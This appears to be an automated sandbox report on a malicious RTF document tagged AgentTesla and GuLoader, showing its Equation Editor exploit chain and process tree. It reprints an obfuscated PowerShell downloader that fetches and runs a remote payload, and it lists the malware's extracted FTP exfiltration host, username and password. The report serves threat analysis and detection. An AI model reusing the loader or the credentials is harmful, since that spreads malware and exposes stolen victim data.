Overview

overview

10

Static

static

1

4lgeug.rtf

windows7-x64

10

4lgeug.rtf

windows10-2004-x64

1

Analysis

  • max time kernel
    142s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    23-04-2024 19:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4lgeug.rtf

  • Size

    68KB

  • MD5

    fff188bebcf8468642229428227ef8ff

  • SHA1

    ec26be493066bcbc12abcf9d4ba374309d3ded83

  • SHA256

    e3986c9a3d1d24b0cff99c78bd92d594eeb6d2a438f14ec6a44e3ef74c86c517

  • SHA512

    264cbbfab0e8b4bb669f2999ced07a3bdf7312601422ff8caae3a45aca1e99b5013221b99f57135169d3824b906bcbe9edcea44db879366e957c1e224648b1a0

  • SSDEEP

    1536:eeAlB6opE4g6RP3efl4+fRfcTxaxzUMcsBbOQNqOWpx6zl+03kaOAh/zRdAe+nhM:fAlB6opE4g6R84+fRfcTEbOQYOWpxo3V

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.elquijotebanquetes.com
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    4r@d15PS!-!h

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4lgeug.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1348
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1736
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\eveningxlamonkey.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2652
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sakkede = 1;$Glycosidase='Substrin';$Glycosidase+='g';Function Ellipsen($retninslinier){$Stigningshastighedshj=$retninslinier.Length-$Sakkede;For($Stigningshastighed=5; $Stigningshastighed -lt $Stigningshastighedshj; $Stigningshastighed+=(6)){$Haandtaskers+=$retninslinier.$Glycosidase.Invoke($Stigningshastighed, $Sakkede);}$Haandtaskers;}function Unbelieffulness($Skeletteringen){& ($Pietoso) ($Skeletteringen);}$Hable=Ellipsen 'CykelMSa dfoCitrozMalteiRy,stlAdheslBakkearelat/,some5Farao.Optrk0Ligas overc( trkWFugtdiTrimmnAutosd Uncoo,verhwscrewsOmni, CompNQuiltTSpeec Fre s1 Babe0D,aly.L.nti0 Wels;Scuti B undW Urodi SigtnBreek6 erra4Unbon;Av rt Ka edx Aq,a6 Mili4Risik; vodi Raveir SkrmvR,gni:Compa1Dyhrs2Feath1Popli.M nte0Sulfo) Fath Pha.oGUrremeEpithcIndvak ProtoPinak/Idiot2B.ase0Uneva1B aaj0Grimi0De,ol1Kanto0Bryll1hyper HarpuFAvlstiProsorTangfearrayfForsmo exadx Rupi/Te eb1 Bepr2Tvrfl1Fjerp.Mistl0Byge, ';$Desponsage=Ellipsen ' ForsU PalesStre eHester Gwer-Bi.frA .ildgcarabeSubvenTomjot mbyg ';$Blushwort=Ellipsen ' ned hMo,ntt sepatKa aspRomu :V nfr/Pr te/Fi,an2Panti3Boa.d. Pycn9Noncr5sjask.syna.6Impre0Ansig.Kalde7Unspr7Dobbe/BoltoFNy,tao Ch,arDrailvSkrd.rLovewi,oulad.onurePelvisSnrkl.T,lepp.etrosAgaladMarme ';$Forretningsstederne=Ellipsen 'S,enc> Fuel ';$Pietoso=Ellipsen 'BlikkiCrypteSuperx ande ';$Theres207='Sljt';Unbelieffulness (Ellipsen ' DrabS S.ine Webbt Avia- LignCAkt eoGylp,n BesttAndase ,tann trkt St.t Ubevi-UnblePtrevlaGa,agtBevilh.ackl MidtpTVer,e:Komma\StreeA DodemC moei PartcOp,iceGormasDybtr.A chatRou.hxDagbdtDybfr Magu-KrigsVCroona.nkeplSpritusidere .nlo Shunt$IndkaTUhde.hSti,pePlegar KonteHo nesAnt.r2 Mat 0Ly be7Unabo;Ignor ');Unbelieffulness (Ellipsen 'fr,dei SpecfDdsst Tr.s(GeocetGeirceImplasUnipotChanc-SslugpUnyokaWontot.tavrhEvalu UnparT Kong:Formf\FarveARepo.mSkubbiBes.rc LimpeCert sC ypt.FlueftJernbxPy.ost Sail)Demob{VrdileDulcixOccipiG amotRepli}M,dde;stjni ');$Albuminernes = Ellipsen '.nddreHauchc U.ifh D,nloIsoto Fl.t%SwathaAnatopWo mhpBe.endGrannaRotart ereaSkeln%Goeth\Off,nTDobbeyDingldSvin eSim,llAttr,iBiotogLabanh Woode Fored Nutle St,cn BlansTungn. .ndrSHejretUnconoSpnt. proeq&Orang&Hoved DysureE,thec .illhTilsaoHawkl Ctrfi$Polla ';Unbelieffulness (Ellipsen ' Trkv$ overgNekrolReseroDorybbBrugsa RufulNargi:AfskeB ga,ae,alvamOb.eca Ameln KnesdOver eManusnElided RetueSymbo3Wimpl4hyoli=dmodm(Pr.lic ResmmCharldun ou Fregn/IntercTurnt un,er$Kap tAGaardlInvalb,lapbuF nktm ,obai Ci.en IntweTthedrIstidn Mil e Anlgs.eden)Do be ');Unbelieffulness (Ellipsen ' dval$Forpug,orselMa,aio Skosb MoleaKlapplLoop,:MicroEFirsifBewidtArrive U avrShemolColisyArgemsEsbennParani SilknZinnngFar e=Asham$Syl,aBMan,blGenopuOatlasFr,mbhMoon wPrussoProporpolittMisgu. Lemms SaggpPretrlAdduciDust.tDjesi( Hi l$ PogrFAbro.oActuargaulorForsaeAmor tFresnnU.deriPla.en HjemgLslodsDromesBa attSdekoeByzand repeeChlorr Str,n.edimeK lor)Fagbe ');$Blushwort=$Efterlysning[0];Unbelieffulness (Ellipsen 'Repar$ ForhgAnienlLuftto SparbTricyaSpiculS mic:EndomTSubhoi SpeclInjurb Kkkea airggFortyeB.zaabCongolAel reHillov StaneTyroct iss=Unde NF.gleeBullewHerbb- inhaOReklabExterjTropeeRashlc ElietBello Ma emS eeksyTeet,sGlobetPincueSt,tam U.pe.u,wieN enereUdk,gt Deno.IndleW erte StrobSku,sCO,drelunreciLitu,eAdminnFirett pect ');Unbelieffulness (Ellipsen ' Stat$tas.wT OsteiIvorylStu,kbHandeaNamergReekieV,diub ErytlIrreveSideovSlendeK,nertbrigg.CorkiH R dieEldoraTintadZi.asePi,lerBo uns Yerb[Overs$ ambsDvirtueEnsaisRvejapSk.peo kkornD,spos EatoaVallegStatseSkri,]Match=Terma$BarviHIsoemaDue.tbLandmlFicheeSonan ');$Ulempefriere=Ellipsen '.dvarT Ry,eiFul.klbotilbDogleaE sprg Ekste ajgbVvstyl,releeUdlndv F,ereTndertDumbe.Rode D DataoColliwF,dignKeefslIlmenoLilleaF,rved G,naF ,rbeiDragalNeslaeGgem,(Unamu$ SepaBUmistlAnthouFjsinsRkebih,tjkowPrestoTil,nrHet rtNo.dm,Duble$ Dat SInterhIndicakalyprRegavkVasopeoverbrSkyll3Besla7Selsk)Renov ';$Ulempefriere=$Bemandende34[1]+$Ulempefriere;$Sharker37=$Bemandende34[0];Unbelieffulness (Ellipsen 'Fanta$Frugtg tittlLecheoZithebKlapja,nporlSprin:FourcBPseudaPartinSmaa d VexaaModtag Uniti Tr.vsHu metc,mpee CatarGradunmu.tie FlamsNedsk5Forho3vgtkl=Keren(PrintTOrdste .eilsNu,natDoere- DublP H,lla An,mt UparhGerle Rod.h$ScopeSAelurhSphenaGrnserRasgakAntrueVoldtr,inne3Conve7 indi)L,tdo ');while (!$Bandagisternes53) {Unbelieffulness (Ellipsen ' Cotw$Gherkg CudglKaolioDrabsbStefaatrla.lS.fii:suzetEF,rsgmHydroyG,rgldMyocae AudiaDissy=Hypot$ Solat ierarRectiuKnibee adon ') ;Unbelieffulness $Ulempefriere;Unbelieffulness (Ellipsen ' HavaS Brn tMi adaLnsatr SlittUnipe-LigevSDaadylPolyceRestreTi idpSlang Hundj4Akt,r ');Unbelieffulness (Ellipsen 'Enegn$EntregPr.molSplk,oCoberb.korpa Fejll Tu,g:GastrBRenteaBlindnCon.idHe.eraforesg Gebii BondsSu,katchummeBamlerUnca,nYata,e Indts.eiru5 Ualm3hippo=Boras(Pr.prT Tor eTranss Z,ndtF mkr-DirecPVanuaa UnmutSulfihAnar, Ety,o$FactoS,jlpehDobbea MilirBackikAntipeChillr Nitr3 Spec7Labor)Icono ') ;Unbelieffulness (Ellipsen 'Peppe$ForudgRetdrlKandioArbejbBordeaRaabal Cyph:St.alsHinknkSub lis.nsefUsseltdiseseRe iofF nato PrebrSok lrPastoeFiltetPopuln,naldiDobben PringudesteBrugsr SybosChoki=After$ Mer.g PejllReassoBodyubMaddiaDisrelY,sin:TelevU anyipG,byrpBlamai M,drs Tredh alfulBefoly.eath+ Feel+Ubevi%F.rud$MalerEoksesfOdy.st QuareTro.frpickelEjahuyAntydsRodskn Sheai Lucen Ledng Iodo.Paapac GgepoKommau Pas.nNongetMes,e ') ;$Blushwort=$Efterlysning[$skifteforretningers];}Unbelieffulness (Ellipsen ' Dev $ TftegW odslBeeleoSuffebGeograRetsplMisos:CytocCSkraboCommor KnopaNegrecVeludoA vinmKanceoSk,umrSubpopAn hrh NonaiM drecHaves Comm=Refa, underG GejleThioht R.od- S opCRenego Bi snAb nntScoreeLigninHoe.ttAuten In r$ Ca,dSPa hlh,ejemaDionyr Splek.ranseper ar .ank3Unpro7Faste ');Unbelieffulness (Ellipsen 'Sk tt$Lev,vgInd.slStddmoWoohobgo.era Sp,glD.mye:FiercA,prinnZwittsVenerpJgerknSkov dprogrtRorideHedwisVelma Kalek=Congr Court[K rtoS ,ortyAr,ensBolshtParene L,njmMechi.ungluC,andso UnspnRebukvRingmeTriglrAnn.atUvede]Fac o:Thero:K.ogeFIndisrRemulo Smr,m NontB lut.ati,essStewaeMichf6 exit4EskadSblgfrtOrthorPlantistorsnUndergUnder(Hunds$UhelbCP incoChiefrSkovpaAnticcRens.olae emEquimoUnrefrY.step.lipchBarbliAndedc Krig)Lurda ');Unbelieffulness (Ellipsen 'Retrt$UopsagKronrl.ordyoBirumb P staDdninl Grot: IvyfU,aldsdS,rums VitapFrimrrHedo jCo,citVelkleZircodCullieKopul Mili=udrin B.tnk[HjtalS Bakey nhibsAbsolt.rpaoesjattmAareg.WhiftT afreeMucipxPolsttReadv.Galv.Etendon f rlcRekomoKapitdchrysit.esmnDybdegFedtp]Knubb:Nonbe:DeledA heaSGerl,COvereIfjer.IAlsea.TolseGFrejdeRotcetDanneSHo,dwt.versrBes,ni Landn UngrgS aki(Sparr$OvercA SnubnMesmesOvermpUdelinElapodDe,ibt C ppePolypsHentr) E.er ');Unbelieffulness (Ellipsen 'E tri$UndergOtidil ,orroKonkubGldsbaKnsrol Wa,h:truncSSnkekpUligerAmeriaunseqiCirc tTuberh .riv=Festr$ DiscU MikidDuvetsUncatpDatoerAppuljClusttGe.anevandldSjofeeK,mle.FeakesUgedauStivnb EkspsWhimbtPalaer AboniV,abenBevrtgPhlo (Revis3Tilko0Siali4Qua.t8Clado6 Flug8Forur,Conf 2 Para8Hydro9,avor4,stra9Forha)Wisco ');Unbelieffulness $Spraith;"
          3⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2852
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tydelighedens.Sto && echo $"
            4⤵
              PID:320
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sakkede = 1;$Glycosidase='Substrin';$Glycosidase+='g';Function Ellipsen($retninslinier){$Stigningshastighedshj=$retninslinier.Length-$Sakkede;For($Stigningshastighed=5; $Stigningshastighed -lt $Stigningshastighedshj; $Stigningshastighed+=(6)){$Haandtaskers+=$retninslinier.$Glycosidase.Invoke($Stigningshastighed, $Sakkede);}$Haandtaskers;}function Unbelieffulness($Skeletteringen){& ($Pietoso) ($Skeletteringen);}$Hable=Ellipsen 'CykelMSa dfoCitrozMalteiRy,stlAdheslBakkearelat/,some5Farao.Optrk0Ligas overc( trkWFugtdiTrimmnAutosd Uncoo,verhwscrewsOmni, CompNQuiltTSpeec Fre s1 Babe0D,aly.L.nti0 Wels;Scuti B undW Urodi SigtnBreek6 erra4Unbon;Av rt Ka edx Aq,a6 Mili4Risik; vodi Raveir SkrmvR,gni:Compa1Dyhrs2Feath1Popli.M nte0Sulfo) Fath Pha.oGUrremeEpithcIndvak ProtoPinak/Idiot2B.ase0Uneva1B aaj0Grimi0De,ol1Kanto0Bryll1hyper HarpuFAvlstiProsorTangfearrayfForsmo exadx Rupi/Te eb1 Bepr2Tvrfl1Fjerp.Mistl0Byge, ';$Desponsage=Ellipsen ' ForsU PalesStre eHester Gwer-Bi.frA .ildgcarabeSubvenTomjot mbyg ';$Blushwort=Ellipsen ' ned hMo,ntt sepatKa aspRomu :V nfr/Pr te/Fi,an2Panti3Boa.d. Pycn9Noncr5sjask.syna.6Impre0Ansig.Kalde7Unspr7Dobbe/BoltoFNy,tao Ch,arDrailvSkrd.rLovewi,oulad.onurePelvisSnrkl.T,lepp.etrosAgaladMarme ';$Forretningsstederne=Ellipsen 'S,enc> Fuel ';$Pietoso=Ellipsen 'BlikkiCrypteSuperx ande ';$Theres207='Sljt';Unbelieffulness (Ellipsen ' DrabS S.ine Webbt Avia- LignCAkt eoGylp,n BesttAndase ,tann trkt St.t Ubevi-UnblePtrevlaGa,agtBevilh.ackl MidtpTVer,e:Komma\StreeA DodemC moei PartcOp,iceGormasDybtr.A chatRou.hxDagbdtDybfr Magu-KrigsVCroona.nkeplSpritusidere .nlo Shunt$IndkaTUhde.hSti,pePlegar KonteHo nesAnt.r2 Mat 0Ly be7Unabo;Ignor ');Unbelieffulness (Ellipsen 'fr,dei SpecfDdsst Tr.s(GeocetGeirceImplasUnipotChanc-SslugpUnyokaWontot.tavrhEvalu UnparT Kong:Formf\FarveARepo.mSkubbiBes.rc LimpeCert sC ypt.FlueftJernbxPy.ost Sail)Demob{VrdileDulcixOccipiG amotRepli}M,dde;stjni ');$Albuminernes = Ellipsen '.nddreHauchc U.ifh D,nloIsoto Fl.t%SwathaAnatopWo mhpBe.endGrannaRotart ereaSkeln%Goeth\Off,nTDobbeyDingldSvin eSim,llAttr,iBiotogLabanh Woode Fored Nutle St,cn BlansTungn. .ndrSHejretUnconoSpnt. proeq&Orang&Hoved DysureE,thec .illhTilsaoHawkl Ctrfi$Polla ';Unbelieffulness (Ellipsen ' Trkv$ overgNekrolReseroDorybbBrugsa RufulNargi:AfskeB ga,ae,alvamOb.eca Ameln KnesdOver eManusnElided RetueSymbo3Wimpl4hyoli=dmodm(Pr.lic ResmmCharldun ou Fregn/IntercTurnt un,er$Kap tAGaardlInvalb,lapbuF nktm ,obai Ci.en IntweTthedrIstidn Mil e Anlgs.eden)Do be ');Unbelieffulness (Ellipsen ' dval$Forpug,orselMa,aio Skosb MoleaKlapplLoop,:MicroEFirsifBewidtArrive U avrShemolColisyArgemsEsbennParani SilknZinnngFar e=Asham$Syl,aBMan,blGenopuOatlasFr,mbhMoon wPrussoProporpolittMisgu. Lemms SaggpPretrlAdduciDust.tDjesi( Hi l$ PogrFAbro.oActuargaulorForsaeAmor tFresnnU.deriPla.en HjemgLslodsDromesBa attSdekoeByzand repeeChlorr Str,n.edimeK lor)Fagbe ');$Blushwort=$Efterlysning[0];Unbelieffulness (Ellipsen 'Repar$ ForhgAnienlLuftto SparbTricyaSpiculS mic:EndomTSubhoi SpeclInjurb Kkkea airggFortyeB.zaabCongolAel reHillov StaneTyroct iss=Unde NF.gleeBullewHerbb- inhaOReklabExterjTropeeRashlc ElietBello Ma emS eeksyTeet,sGlobetPincueSt,tam U.pe.u,wieN enereUdk,gt Deno.IndleW erte StrobSku,sCO,drelunreciLitu,eAdminnFirett pect ');Unbelieffulness (Ellipsen ' Stat$tas.wT OsteiIvorylStu,kbHandeaNamergReekieV,diub ErytlIrreveSideovSlendeK,nertbrigg.CorkiH R dieEldoraTintadZi.asePi,lerBo uns Yerb[Overs$ ambsDvirtueEnsaisRvejapSk.peo kkornD,spos EatoaVallegStatseSkri,]Match=Terma$BarviHIsoemaDue.tbLandmlFicheeSonan ');$Ulempefriere=Ellipsen '.dvarT Ry,eiFul.klbotilbDogleaE sprg Ekste ajgbVvstyl,releeUdlndv F,ereTndertDumbe.Rode D DataoColliwF,dignKeefslIlmenoLilleaF,rved G,naF ,rbeiDragalNeslaeGgem,(Unamu$ SepaBUmistlAnthouFjsinsRkebih,tjkowPrestoTil,nrHet rtNo.dm,Duble$ Dat SInterhIndicakalyprRegavkVasopeoverbrSkyll3Besla7Selsk)Renov ';$Ulempefriere=$Bemandende34[1]+$Ulempefriere;$Sharker37=$Bemandende34[0];Unbelieffulness (Ellipsen 'Fanta$Frugtg tittlLecheoZithebKlapja,nporlSprin:FourcBPseudaPartinSmaa d VexaaModtag Uniti Tr.vsHu metc,mpee CatarGradunmu.tie FlamsNedsk5Forho3vgtkl=Keren(PrintTOrdste .eilsNu,natDoere- DublP H,lla An,mt UparhGerle Rod.h$ScopeSAelurhSphenaGrnserRasgakAntrueVoldtr,inne3Conve7 indi)L,tdo ');while (!$Bandagisternes53) {Unbelieffulness (Ellipsen ' Cotw$Gherkg CudglKaolioDrabsbStefaatrla.lS.fii:suzetEF,rsgmHydroyG,rgldMyocae AudiaDissy=Hypot$ Solat ierarRectiuKnibee adon ') ;Unbelieffulness $Ulempefriere;Unbelieffulness (Ellipsen ' HavaS Brn tMi adaLnsatr SlittUnipe-LigevSDaadylPolyceRestreTi idpSlang Hundj4Akt,r ');Unbelieffulness (Ellipsen 'Enegn$EntregPr.molSplk,oCoberb.korpa Fejll Tu,g:GastrBRenteaBlindnCon.idHe.eraforesg Gebii BondsSu,katchummeBamlerUnca,nYata,e Indts.eiru5 Ualm3hippo=Boras(Pr.prT Tor eTranss Z,ndtF mkr-DirecPVanuaa UnmutSulfihAnar, Ety,o$FactoS,jlpehDobbea MilirBackikAntipeChillr Nitr3 Spec7Labor)Icono ') ;Unbelieffulness (Ellipsen 'Peppe$ForudgRetdrlKandioArbejbBordeaRaabal Cyph:St.alsHinknkSub lis.nsefUsseltdiseseRe iofF nato PrebrSok lrPastoeFiltetPopuln,naldiDobben PringudesteBrugsr SybosChoki=After$ Mer.g PejllReassoBodyubMaddiaDisrelY,sin:TelevU anyipG,byrpBlamai M,drs Tredh alfulBefoly.eath+ Feel+Ubevi%F.rud$MalerEoksesfOdy.st QuareTro.frpickelEjahuyAntydsRodskn Sheai Lucen Ledng Iodo.Paapac GgepoKommau Pas.nNongetMes,e ') ;$Blushwort=$Efterlysning[$skifteforretningers];}Unbelieffulness (Ellipsen ' Dev $ TftegW odslBeeleoSuffebGeograRetsplMisos:CytocCSkraboCommor KnopaNegrecVeludoA vinmKanceoSk,umrSubpopAn hrh NonaiM drecHaves Comm=Refa, underG GejleThioht R.od- S opCRenego Bi snAb nntScoreeLigninHoe.ttAuten In r$ Ca,dSPa hlh,ejemaDionyr Splek.ranseper ar .ank3Unpro7Faste ');Unbelieffulness (Ellipsen 'Sk tt$Lev,vgInd.slStddmoWoohobgo.era Sp,glD.mye:FiercA,prinnZwittsVenerpJgerknSkov dprogrtRorideHedwisVelma Kalek=Congr Court[K rtoS ,ortyAr,ensBolshtParene L,njmMechi.ungluC,andso UnspnRebukvRingmeTriglrAnn.atUvede]Fac o:Thero:K.ogeFIndisrRemulo Smr,m NontB lut.ati,essStewaeMichf6 exit4EskadSblgfrtOrthorPlantistorsnUndergUnder(Hunds$UhelbCP incoChiefrSkovpaAnticcRens.olae emEquimoUnrefrY.step.lipchBarbliAndedc Krig)Lurda ');Unbelieffulness (Ellipsen 'Retrt$UopsagKronrl.ordyoBirumb P staDdninl Grot: IvyfU,aldsdS,rums VitapFrimrrHedo jCo,citVelkleZircodCullieKopul Mili=udrin B.tnk[HjtalS Bakey nhibsAbsolt.rpaoesjattmAareg.WhiftT afreeMucipxPolsttReadv.Galv.Etendon f rlcRekomoKapitdchrysit.esmnDybdegFedtp]Knubb:Nonbe:DeledA heaSGerl,COvereIfjer.IAlsea.TolseGFrejdeRotcetDanneSHo,dwt.versrBes,ni Landn UngrgS aki(Sparr$OvercA SnubnMesmesOvermpUdelinElapodDe,ibt C ppePolypsHentr) E.er ');Unbelieffulness (Ellipsen 'E tri$UndergOtidil ,orroKonkubGldsbaKnsrol Wa,h:truncSSnkekpUligerAmeriaunseqiCirc tTuberh .riv=Festr$ DiscU MikidDuvetsUncatpDatoerAppuljClusttGe.anevandldSjofeeK,mle.FeakesUgedauStivnb EkspsWhimbtPalaer AboniV,abenBevrtgPhlo (Revis3Tilko0Siali4Qua.t8Clado6 Flug8Forur,Conf 2 Para8Hydro9,avor4,stra9Forha)Wisco ');Unbelieffulness $Spraith;"
              4⤵
              • Drops file in System32 directory
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1744
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tydelighedens.Sto && echo $"
                5⤵
                  PID:1616
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe"
                  5⤵
                  • Suspicious use of NtCreateThreadExHideFromDebugger
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2076

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
          Filesize

          20KB

          MD5

          f88e984e20b395cd404e143ea731d172

          SHA1

          c56f649c32ae4a99368364b70b975e0c05bd0577

          SHA256

          d301a3cf174d293a18b62d2695a0ecc7d131e7ccf0af3a39c340cd5b771543e7

          SHA512

          b1726338f10949b443bb23a1a2cbc41fc3b98ffef2277e624c7ba4b1a7e8897229253ffdced60b536302e0df740949a8ac829318500ca0a6263135c1008a14b1

          Download Submit
        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          Filesize

          7KB

          MD5

          315f2bb8674e090f21b05322a3911c57

          SHA1

          65d06ea4f3b2978f926830167f8fe38790da9fe5

          SHA256

          52d94a7ffcaf9d397ce96a445b337929d5c3ae76a4b9519e53e7cb7e159c226c

          SHA512

          8c638d5b00a1807e25b5a898c13faf9d30fdf11f06603fd9a0a74b6b459daa1cda0df7a58517374b58ebe2f1ab9f0b7979896fc5def5e9b23cbe3510f96fe3fb

          Download Submit
        • C:\Users\Admin\AppData\Roaming\Tydelighedens.Sto
          Filesize

          434KB

          MD5

          d5dd560eda26eac1265d7857f5fc4ff9

          SHA1

          f61199b0cfa0d630aef32402e9c8f49c31a0cc71

          SHA256

          ec74b4265f8874908d904eda09477d4e9d6fd8cc4c2f23e48df70e3d922c3e49

          SHA512

          6d206f43c074936783402990b112a23792fc64d72ecae45368c92f1d5c15371ab26caa001a8dd17fdbdacb72f650e34b7d3f6980631a192750b6479ba7577d17

          Download Submit
        • C:\Users\Admin\AppData\Roaming\eveningxlamonkey.vbs
          Filesize

          7KB

          MD5

          fc76593b1fea2b3f3b0408db187f4b50

          SHA1

          726281cc7bc010062290e79a8682ef00d96cc39e

          SHA256

          acf6f65f5de2207b521909f21a3ebbbbe94a6352094c26cc8c49388d75e32c2c

          SHA512

          71e286961e85dbd8e116817d2f58f5886d9c92c81130f1e54061775c5572b9e154ca39e6b5afa38bd216c844fb3ceb5d176d28bdefea40c36af66d75053896ab

          Download Submit
        • memory/1744-44-0x00000000029F0000-0x0000000002A30000-memory.dmp
          Filesize

          256KB

          Download
        • memory/1744-45-0x00000000055C0000-0x00000000055C1000-memory.dmp
          Filesize

          4KB

          Download
        • memory/1744-46-0x00000000066D0000-0x000000000991F000-memory.dmp
          Filesize

          50.3MB

          Download
        • memory/1744-47-0x00000000066D0000-0x000000000991F000-memory.dmp
          Filesize

          50.3MB

          Download
        • memory/1744-63-0x00000000066D0000-0x000000000991F000-memory.dmp
          Filesize

          50.3MB

          Download
        • memory/1744-55-0x00000000066D0000-0x000000000991F000-memory.dmp
          Filesize

          50.3MB

          Download
        • memory/1744-51-0x0000000077C10000-0x0000000077CE6000-memory.dmp
          Filesize

          856KB

          Download
        • memory/1744-50-0x00000000029F0000-0x0000000002A30000-memory.dmp
          Filesize

          256KB

          Download
        • memory/1744-34-0x000000006B680000-0x000000006BC2B000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/1744-35-0x00000000029F0000-0x0000000002A30000-memory.dmp
          Filesize

          256KB

          Download
        • memory/1744-36-0x000000006B680000-0x000000006BC2B000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/1744-37-0x00000000029F0000-0x0000000002A30000-memory.dmp
          Filesize

          256KB

          Download
        • memory/1744-49-0x000000006B680000-0x000000006BC2B000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/1744-39-0x0000000005650000-0x00000000056AC000-memory.dmp
          Filesize

          368KB

          Download
        • memory/1744-40-0x0000000002B10000-0x0000000002B1A000-memory.dmp
          Filesize

          40KB

          Download
        • memory/1744-48-0x0000000077A20000-0x0000000077BC9000-memory.dmp
          Filesize

          1.7MB

          Download
        • memory/1744-41-0x0000000005590000-0x00000000055A0000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2076-58-0x0000000000F90000-0x0000000001FF2000-memory.dmp
          Filesize

          16.4MB

          Download
        • memory/2076-57-0x0000000077C46000-0x0000000077C47000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2076-61-0x0000000000F90000-0x0000000000FD2000-memory.dmp
          Filesize

          264KB

          Download
        • memory/2076-60-0x0000000000F90000-0x0000000001FF2000-memory.dmp
          Filesize

          16.4MB

          Download
        • memory/2076-70-0x0000000020A70000-0x0000000020AB0000-memory.dmp
          Filesize

          256KB

          Download
        • memory/2076-65-0x0000000020A70000-0x0000000020AB0000-memory.dmp
          Filesize

          256KB

          Download
        • memory/2076-62-0x0000000065EA0000-0x000000006658E000-memory.dmp
          Filesize

          6.9MB

          Download
        • memory/2076-56-0x0000000077C10000-0x0000000077CE6000-memory.dmp
          Filesize

          856KB

          Download
        • memory/2076-69-0x0000000065EA0000-0x000000006658E000-memory.dmp
          Filesize

          6.9MB

          Download
        • memory/2076-52-0x0000000002000000-0x000000000524F000-memory.dmp
          Filesize

          50.3MB

          Download
        • memory/2076-54-0x0000000077A20000-0x0000000077BC9000-memory.dmp
          Filesize

          1.7MB

          Download
        • memory/2076-66-0x0000000002000000-0x000000000524F000-memory.dmp
          Filesize

          50.3MB

          Download
        • memory/2372-0-0x000000002F9F1000-0x000000002F9F2000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2372-2-0x00000000717FD000-0x0000000071808000-memory.dmp
          Filesize

          44KB

          Download
        • memory/2372-42-0x00000000717FD000-0x0000000071808000-memory.dmp
          Filesize

          44KB

          Download
        • memory/2372-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2372-91-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2852-15-0x000000006B680000-0x000000006BC2B000-memory.dmp
          Filesize

